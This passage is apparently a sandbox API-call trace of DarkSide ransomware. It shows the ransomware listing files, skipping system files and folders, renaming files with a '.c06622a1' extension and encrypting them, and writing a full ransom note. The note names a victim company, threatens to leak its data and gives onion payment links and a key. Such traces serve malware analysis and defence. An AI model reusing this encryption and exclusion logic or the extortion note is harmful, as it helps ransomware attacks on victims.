(_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 0x40 [0150.230] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.230] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.c06622a1"), dwFlags=0x8) returned 1 [0150.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0150.233] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.233] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51548dd2 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2dcd96ab [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29102dc0 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f6e9234 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14bb2023 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x728f9485 [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1baaf45c [0150.238] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39766329 [0150.241] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0xf54a45ee [0150.241] RtlComputeCrc32 (PartialCrc=0x45ee, Buffer=0x49d0094, Length=0x80) returned 0xb4e0c92a [0150.241] RtlComputeCrc32 (PartialCrc=0xc92a, Buffer=0x49d0094, Length=0x80) returned 0x832ef6d3 [0150.241] RtlComputeCrc32 (PartialCrc=0xf6d3, Buffer=0x49d0094, Length=0x80) returned 0x541206e3 [0150.241] RtlComputeCrc32 (PartialCrc=0x6e3, Buffer=0x49d0094, Length=0x80) returned 0x76e4014d [0150.241] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0150.241] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.241] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.241] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0150.242] _wcsicmp (_Str1="MSNBC News.url", _Str2="README.c06622a1.TXT") returned -5 [0150.242] wcsstr (_Str="MSNBC News.url", _SubStr="README") returned 0x0 [0150.242] _wcsicmp (_Str1="autorun.inf", _Str2="MSNBC News.url") returned -12 [0150.242] wcslen (_String="autorun.inf") returned 0xb [0150.242] _wcsicmp (_Str1="boot.ini", _Str2="MSNBC News.url") returned -11 [0150.242] wcslen (_String="boot.ini") returned 0x8 [0150.242] _wcsicmp (_Str1="bootfont.bin", _Str2="MSNBC News.url") returned -11 [0150.242] wcslen (_String="bootfont.bin") returned 0xc [0150.242] _wcsicmp (_Str1="bootsect.bak", _Str2="MSNBC News.url") returned -11 [0150.242] wcslen (_String="bootsect.bak") returned 0xc [0150.242] _wcsicmp (_Str1="desktop.ini", _Str2="MSNBC News.url") returned -9 [0150.242] wcslen (_String="desktop.ini") returned 0xb [0150.242] _wcsicmp (_Str1="iconcache.db", _Str2="MSNBC News.url") returned -4 [0150.242] wcslen (_String="iconcache.db") returned 0xc [0150.242] _wcsicmp (_Str1="ntldr", _Str2="MSNBC News.url") returned 1 [0150.242] wcslen (_String="ntldr") returned 0x5 [0150.242] _wcsicmp (_Str1="ntuser.dat", _Str2="MSNBC News.url") returned 1 [0150.242] wcslen (_String="ntuser.dat") returned 0xa [0150.242] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSNBC News.url") returned 1 [0150.242] wcslen (_String="ntuser.dat.log") returned 0xe [0150.242] _wcsicmp (_Str1="ntuser.ini", _Str2="MSNBC News.url") returned 1 [0150.242] wcslen (_String="ntuser.ini") returned 0xa [0150.243] _wcsicmp (_Str1="thumbs.db", _Str2="MSNBC News.url") returned 7 [0150.243] wcslen (_String="thumbs.db") returned 0x9 [0150.243] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.243] wcslen (_String="386") returned 0x3 [0150.243] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.243] wcslen (_String="adv") returned 0x3 [0150.243] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.243] wcslen (_String="ani") returned 0x3 [0150.243] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.243] wcslen (_String="bat") returned 0x3 [0150.243] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.243] wcslen (_String="bin") returned 0x3 [0150.243] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.243] wcslen (_String="cab") returned 0x3 [0150.243] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.243] wcslen (_String="cmd") returned 0x3 [0150.243] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.243] wcslen (_String="com") returned 0x3 [0150.243] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.243] wcslen (_String="cpl") returned 0x3 [0150.243] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.243] wcslen (_String="cur") returned 0x3 [0150.243] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.243] wcslen (_String="deskthemepack") returned 0xd [0150.243] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.243] wcslen (_String="diagcab") returned 0x7 [0150.243] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.243] wcslen (_String="diagcfg") returned 0x7 [0150.243] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.243] wcslen (_String="diagpkg") returned 0x7 [0150.243] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.243] wcslen (_String="dll") returned 0x3 [0150.243] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.243] wcslen (_String="drv") returned 0x3 [0150.243] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.243] wcslen (_String="exe") returned 0x3 [0150.243] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.244] wcslen (_String="hlp") returned 0x3 [0150.244] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.244] wcslen (_String="icl") returned 0x3 [0150.244] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.244] wcslen (_String="icns") returned 0x4 [0150.244] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.244] wcslen (_String="ico") returned 0x3 [0150.244] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.244] wcslen (_String="ics") returned 0x3 [0150.244] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.244] wcslen (_String="idx") returned 0x3 [0150.244] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.244] wcslen (_String="ldf") returned 0x3 [0150.244] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.244] wcslen (_String="lnk") returned 0x3 [0150.244] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.244] wcslen (_String="mod") returned 0x3 [0150.244] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.244] wcslen (_String="mpa") returned 0x3 [0150.244] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.244] wcslen (_String="msc") returned 0x3 [0150.244] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.244] wcslen (_String="msp") returned 0x3 [0150.244] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.244] wcslen (_String="msstyles") returned 0x8 [0150.244] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.244] wcslen (_String="msu") returned 0x3 [0150.244] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.244] wcslen (_String="nls") returned 0x3 [0150.244] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.244] wcslen (_String="nomedia") returned 0x7 [0150.244] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.244] wcslen (_String="ocx") returned 0x3 [0150.244] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.244] wcslen (_String="prf") returned 0x3 [0150.244] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.244] wcslen (_String="ps1") returned 0x3 [0150.245] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.245] wcslen (_String="rom") returned 0x3 [0150.245] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.245] wcslen (_String="rtp") returned 0x3 [0150.245] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.245] wcslen (_String="scr") returned 0x3 [0150.245] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.245] wcslen (_String="shs") returned 0x3 [0150.245] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.245] wcslen (_String="spl") returned 0x3 [0150.245] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.245] wcslen (_String="sys") returned 0x3 [0150.245] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.245] wcslen (_String="theme") returned 0x5 [0150.245] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.245] wcslen (_String="themepack") returned 0x9 [0150.245] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.245] wcslen (_String="wpx") returned 0x3 [0150.245] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.245] wcslen (_String="lock") returned 0x4 [0150.245] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.245] wcslen (_String="key") returned 0x3 [0150.245] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.245] wcslen (_String="hta") returned 0x3 [0150.245] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.245] wcslen (_String="msi") returned 0x3 [0150.245] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.245] wcslen (_String="pdb") returned 0x3 [0150.245] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.245] wcslen (_String="sql") returned 0x3 [0150.245] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.245] wcslen (_String="sqlite") returned 0x6 [0150.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.245] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.246] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.246] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.246] wcscpy (in: _Dest=0x4500102, _Source="MSNBC News.url" | out: _Dest="MSNBC News.url") returned="MSNBC News.url" [0150.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 1 [0150.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0150.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.246] CloseHandle (hObject=0x134) returned 1 [0150.246] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.246] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" [0150.246] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 0x47 [0150.246] wcscpy (in: _Dest=0x4510126, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.246] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.c06622a1"), dwFlags=0x8) returned 1 [0150.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0150.249] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.249] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32d24ac2 [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63c17f1 [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f6e3471 [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3662c8bf [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5926f26 [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b4aeffa [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x721cdd2c [0150.254] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31c0d182 [0150.257] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x56bd7a3e [0150.257] RtlComputeCrc32 (PartialCrc=0x7a3e, Buffer=0x4a60094, Length=0x80) returned 0x20b030ec [0150.257] RtlComputeCrc32 (PartialCrc=0x30ec, Buffer=0x4a60094, Length=0x80) returned 0x72787aaf [0150.257] RtlComputeCrc32 (PartialCrc=0x7aaf, Buffer=0x4a60094, Length=0x80) returned 0x8821f8d4 [0150.257] RtlComputeCrc32 (PartialCrc=0xf8d4, Buffer=0x4a60094, Length=0x80) returned 0x8b1eeeac [0150.257] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0150.257] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.257] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.257] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81d9940, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd81d9940, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd81d9940, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.257] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.257] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.257] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0150.258] _wcsicmp (_Str1="backup", _Str2="MSN Websites") returned -11 [0150.258] wcslen (_String="backup") returned 0x6 [0150.258] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0150.258] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0150.258] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f9e4a0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7f9e4a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7f9e4a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.258] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.258] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0150.258] _wcsicmp (_Str1="$recycle.bin", _Str2="Windows Live") returned -83 [0150.258] wcslen (_String="$recycle.bin") returned 0xc [0150.258] _wcsicmp (_Str1="config.msi", _Str2="Windows Live") returned -20 [0150.258] wcslen (_String="config.msi") returned 0xa [0150.258] _wcsicmp (_Str1="$windows.~bt", _Str2="Windows Live") returned -83 [0150.258] wcslen (_String="$windows.~bt") returned 0xc [0150.258] _wcsicmp (_Str1="$windows.~ws", _Str2="Windows Live") returned -83 [0150.258] wcslen (_String="$windows.~ws") returned 0xc [0150.258] _wcsicmp (_Str1="windows", _Str2="Windows Live") returned -32 [0150.258] wcslen (_String="windows") returned 0x7 [0150.258] _wcsicmp (_Str1="appdata", _Str2="Windows Live") returned -22 [0150.258] wcslen (_String="appdata") returned 0x7 [0150.258] _wcsicmp (_Str1="application data", _Str2="Windows Live") returned -22 [0150.258] wcslen (_String="application data") returned 0x10 [0150.258] _wcsicmp (_Str1="boot", _Str2="Windows Live") returned -21 [0150.258] wcslen (_String="boot") returned 0x4 [0150.258] _wcsicmp (_Str1="google", _Str2="Windows Live") returned -16 [0150.258] wcslen (_String="google") returned 0x6 [0150.258] _wcsicmp (_Str1="mozilla", _Str2="Windows Live") returned -10 [0150.258] wcslen (_String="mozilla") returned 0x7 [0150.258] _wcsicmp (_Str1="program files", _Str2="Windows Live") returned -7 [0150.258] wcslen (_String="program files") returned 0xd [0150.258] _wcsicmp (_Str1="program files (x86)", _Str2="Windows Live") returned -7 [0150.259] wcslen (_String="program files (x86)") returned 0x13 [0150.259] _wcsicmp (_Str1="programdata", _Str2="Windows Live") returned -7 [0150.259] wcslen (_String="programdata") returned 0xb [0150.259] _wcsicmp (_Str1="system volume information", _Str2="Windows Live") returned -4 [0150.259] wcslen (_String="system volume information") returned 0x19 [0150.259] _wcsicmp (_Str1="tor browser", _Str2="Windows Live") returned -3 [0150.259] wcslen (_String="tor browser") returned 0xb [0150.259] _wcsicmp (_Str1="windows.old", _Str2="Windows Live") returned 14 [0150.259] wcslen (_String="windows.old") returned 0xb [0150.259] _wcsicmp (_Str1="intel", _Str2="Windows Live") returned -14 [0150.259] wcslen (_String="intel") returned 0x5 [0150.259] _wcsicmp (_Str1="msocache", _Str2="Windows Live") returned -10 [0150.259] wcslen (_String="msocache") returned 0x8 [0150.259] _wcsicmp (_Str1="perflogs", _Str2="Windows Live") returned -7 [0150.259] wcslen (_String="perflogs") returned 0x8 [0150.259] _wcsicmp (_Str1="x64dbg", _Str2="Windows Live") returned 1 [0150.259] wcslen (_String="x64dbg") returned 0x6 [0150.259] _wcsicmp (_Str1="public", _Str2="Windows Live") returned -7 [0150.259] wcslen (_String="public") returned 0x6 [0150.259] _wcsicmp (_Str1="all users", _Str2="Windows Live") returned -22 [0150.259] wcslen (_String="all users") returned 0x9 [0150.259] _wcsicmp (_Str1="default", _Str2="Windows Live") returned -19 [0150.259] wcslen (_String="default") returned 0x7 [0150.259] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0150.259] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0150.259] wcscpy (in: _Dest=0x44b00c0, _Source="Windows Live" | out: _Dest="Windows Live") returned="Windows Live" [0150.259] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0150.259] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0150.259] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0150.259] GetNamedSecurityInfoW () returned 0x0 [0150.260] SetEntriesInAclW () returned 0x0 [0150.260] SetNamedSecurityInfoW () returned 0x0 [0150.263] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57c98) returned 1 [0150.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.263] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 1 [0150.263] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.263] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.263] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.264] CloseHandle (hObject=0x678) returned 1 [0150.264] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0150.265] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS 